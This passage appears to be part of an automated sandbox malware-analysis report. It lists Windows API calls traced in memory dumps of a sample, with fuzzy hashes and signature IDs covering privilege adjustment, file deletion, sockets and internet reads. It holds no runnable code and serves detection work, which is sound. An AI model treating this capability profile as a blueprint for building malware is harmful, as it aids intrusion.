                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5DAB8
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5DAE2
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C5DAC7,?,?), ref: 00C5DB5D
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 00C5DAFE
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C5DB0F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                            • Opcode ID: 169e0af0b4386abf55d5d6137251be829e61bb615579ac1d13e26a8668b7b7e5
                                                                                                                                                                                                                                                                            • Instruction ID: cd2b17c2f3a80d33b48fb8e0a9941f9cd4a4a4cfc92d56b70bd0657165831dab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 169e0af0b4386abf55d5d6137251be829e61bb615579ac1d13e26a8668b7b7e5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F61393580120DABCF15EBA0D992EFDB7B5AF14301F2040A5E902B7192EB315F4DDB65
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                            • Opcode ID: 48db109673e31eb18acde2f9dae796bdc3f111ea2966bd22d9bef1dbce5c1916
                                                                                                                                                                                                                                                                            • Instruction ID: ba3086078cb3f8ebef819667c7bad1482fc32a341251b96775600c424ff8f817
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48db109673e31eb18acde2f9dae796bdc3f111ea2966bd22d9bef1dbce5c1916
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE418D31604616AFD720DF15E889F29BBE4EF45319F14C4ADE42A8B6A2C735ED42CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5205A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C52087
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: GetLastError.KERNEL32 ref: 00C52097
                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00C5F249
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                            • Opcode ID: 81b4c1b7c8282d0988c9d115b9d99e70815a6fc4f4c473459e11c4d1f26ea5e4
                                                                                                                                                                                                                                                                            • Instruction ID: 731f39533d587fcda84555852a47017bd4b5bb2906464d69dc6553946ca47561
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81b4c1b7c8282d0988c9d115b9d99e70815a6fc4f4c473459e11c4d1f26ea5e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9014EBE6113146BEB1C22B89CC9FBF735C9B08342F140535FD13E20D1D5604D899358
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2BD54
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2BD78
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2BEFF
                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C946D0), ref: 00C2BF11
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C2BF89
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC2270,000000FF,?,0000003F,00000000,?), ref: 00C2BFB6
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2C0CB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 314583886-0
                                                                                                                                                                                                                                                                            • Opcode ID: c58749582e9e56b0d324fc6ecfbff29f65186f5529afbcf9afbc54dba2880919
                                                                                                                                                                                                                                                                            • Instruction ID: 0532cdc5f8accccfd9115d90c8a1615898de0212f04ada9a39384555ec09d741
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c58749582e9e56b0d324fc6ecfbff29f65186f5529afbcf9afbc54dba2880919
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27C13935900225AFDB24DF78EC41BEEBBB8EF41320F14419AE5A19B691E7309F41DB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C356C2,?,?,00000000,00000000), ref: 00C63A1E
                                                                                                                                                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C356C2,?,?,00000000,00000000), ref: 00C63A35
                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00C356C2,?,?,00000000,00000000,?,?,?,?,?,?,00BF66CE), ref: 00C63A45
                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00C356C2,?,?,00000000,00000000,?,?,?,?,?,?,00BF66CE), ref: 00C63A56
                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00C356C2,?,?,00C356C2,?,?,00000000,00000000,?,?,?,?,?,?,00BF66CE,?), ref: 00C63A65
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                            • String ID: SCRIPT
                                                                                                                                                                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                            • Opcode ID: 6d7708dbcd98c7dab435707615506b7df78896ffc5b7b7eba7e59de5fb7bbade
                                                                                                                                                                                                                                                                            • Instruction ID: 1cb94de8d706f07f3b7611e80064776a09fb4a7d1c1ca7064e8f46f748e8a716
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d7708dbcd98c7dab435707615506b7df78896ffc5b7b7eba7e59de5fb7bbade
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC115770200701AFE7258BA5DC88F2B7BB9EFC5B50F14426DB812962A0DB71ED01EB20
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C51916
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C51922
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C51931
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C51938
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C5194E
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00C51C81), ref: 00C520FB
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C52107
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C5210E
                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C52127
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00C51C81), ref: 00C5213B
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C52142
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                            • Opcode ID: fd05d11d5e731d9247440f700ee70deccc67960d0600b66f0f9f2703002fe38c
                                                                                                                                                                                                                                                                            • Instruction ID: d28aa51eb3d9e0a6bb9e976eb0b2b2afce52055445b06fb9751a84372b2e270c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd05d11d5e731d9247440f700ee70deccc67960d0600b66f0f9f2703002fe38c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E110075501604FFDB149FA4CC08FAF7BB9EF52366F144018E942931A0C7319E88CB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C6A5BD
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C6A6D0
                                                                                                                                                                                                                                                                              • Part of subcall function 00C642B9: GetInputState.USER32 ref: 00C64310
                                                                                                                                                                                                                                                                              • Part of subcall function 00C642B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C643AB
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C6A5ED
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C6A6BA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                            • Opcode ID: 3e54cf7f24518f96b264bdc1117757d705d36919ecea927b6dc8df19276a3543
                                                                                                                                                                                                                                                                            • Instruction ID: 53c9ad6e9f568fa715527e375d3b1e3ea7938e1a439c306821745d0a29223c42
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e54cf7f24518f96b264bdc1117757d705d36919ecea927b6dc8df19276a3543
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A411F7590020AAFCF24EF64C989AEE7BB4EF05310F144155F916B3191EB319E54DF61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 00BF233E
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00BF2421
                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00BF2434
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 929743424-0
                                                                                                                                                                                                                                                                            • Opcode ID: b03771ad48b39c212fd34e681d29080752d8b442ee8141d778d159a373525e17
                                                                                                                                                                                                                                                                            • Instruction ID: e25897c6dc1dc414b8fc19e9d277eab8bc31692c7009d153a8d6be129854c6d2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b03771ad48b39c212fd34e681d29080752d8b442ee8141d778d159a373525e17
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 618102F011444CBEE629672C8DA9EBF25DEDB42304F15018AF702C7695C9698F4A937F
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C73AD7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73AAB: _wcslen.LIBCMT ref: 00C73AF8
                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C722BA
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C722E1
                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C72338
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C72343
                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C72372
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7924a05b7f07bb5dc79594c501d4d9d68de78c1ee5b4755333d124d24d44e978
                                                                                                                                                                                                                                                                            • Instruction ID: e782f157bd3bb9fba8dce92dfe32161d981ccd7717c252932ffd6b39e6a6ef79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7924a05b7f07bb5dc79594c501d4d9d68de78c1ee5b4755333d124d24d44e978
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73519371A00204AFE710AF24C886F3AB7E5AB45758F48C098F95A9B3D3C674ED41CBA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                                            • Opcode ID: af09c49dfd7d461dad7b6c883174137d08517e35b3b507556b6e0dee8d02a79a
                                                                                                                                                                                                                                                                            • Instruction ID: 9d4882c89ebced5976341ff72d3bca6973f760098a50132d7be754eeee6b018d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af09c49dfd7d461dad7b6c883174137d08517e35b3b507556b6e0dee8d02a79a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D121F7317002159FD711AF27C848B1A7BE5EF85318F58806DE85ACB351DB71ED42CB98
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00C6D8CE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C6D92F
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 00C6D943
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 234945975-0
                                                                                                                                                                                                                                                                            • Opcode ID: 658d282834c9f801f4ee8b1875c3ff7bd4829e433ee1b251e4d06c026e8507c4
                                                                                                                                                                                                                                                                            • Instruction ID: 91d8adf1277c3fe8d3c77e46464620b633e7408b114e13dbbc8b8f508a82ddda
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 658d282834c9f801f4ee8b1875c3ff7bd4829e433ee1b251e4d06c026e8507c4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF219D71A00705ABE7309FA6D888BAAB7F8EF41314F10442EE657D2191EB70EE45DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00C346AC), ref: 00C5E482
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C5E491
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C5E4A2
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C5E4AE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                            • Opcode ID: ec6feabd6b6315639cbe12f49765a47d7e7b5be8bf285414e51d113eae27ff59
